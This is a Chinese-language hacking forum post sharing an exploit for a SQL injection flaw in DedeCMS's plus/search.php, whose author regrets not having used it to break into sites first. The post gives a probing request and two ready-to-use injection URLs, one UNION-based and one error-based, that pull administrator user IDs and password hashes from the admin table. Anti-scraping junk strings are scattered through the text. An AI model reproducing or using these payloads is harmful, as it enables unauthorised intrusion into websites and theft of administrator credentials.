中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]

作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ3 K" R7 k+ V( ?4 J

8 T9 Z* F/ E: \+ D哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
- T9 Z$ B/ S4 K! ]( q; I) T+ [( e! A
% N/ f- d2 K- ]% _; _) z1 j2 Y既然已经发出来了,我就把我自己搞的exp发下吧。。唉。6 [1 ?( W( S0 P  F, [/ E8 g* V

5 P- n& F4 g, {我一般是这样测试的:" k6 |2 T: [% Q" p1 D0 a

7 ]7 s) j& y! N  u  P. u8 F提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
( b: s9 p2 C( Y
8 m0 y) Q% u+ Y# Y  P2 m4 q% _0 {转载不加作者名的没JJ
" N' z  n( m9 L
# H3 m9 ]9 X9 G/ ^0 \& n3 F作者:鬼哥
7 E# i  ~  _! p- T5 b* d9 _, X9 \) b( [
0 M9 g' ~  N, s( ^# M& z

1 a+ w2 g: \: Z" A- Z看结果如果提示- W$ R, z2 U$ i1 ?& W( b; j: K" V
" L$ _1 J9 A4 D$ H: y3 p" D
Safe Alert: Request Error step 2 !
2 X% [% P4 H! z0 W3 ^1 {9 ]# c2 ]5 V; e. ~' w4 b
那么直接用下面的exp
  r, \  i. m! V% z7 d8 E+ E0 A6 t
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
6 X. B+ D. M4 D. {; K( x" {% L  Y
4 X& I  ]4 D+ _5 x8 R1 z# C# l! U) U. B: k/ W( H+ V' Z2 t
看结果如果提示; p2 z# p6 s/ N$ H, j5 T' o
5 Z9 p7 C" j# C2 T# C/ x  m% c
Safe Alert: Request Error step 1 !0 o# ^+ j/ H: i1 a0 N
1 l7 O: l, E; L% H1 S- |
那么直接用下面的exp
2 s! D0 @4 E. w5 L, z  s- v( |1 v# [- K, r' _7 s
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
# t& J, I) y7 Y4 T9 \1 l! M& [' J7 D* n0 z* y# D

) c- P  s9 ~% q) e2 @% h  Q如果正常显示证明漏洞不存在了。
; I6 V4 w/ {$ ]& a9 w" ^) }
1 V1 l0 w, g& L% `转载不加作者名的没JJ




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2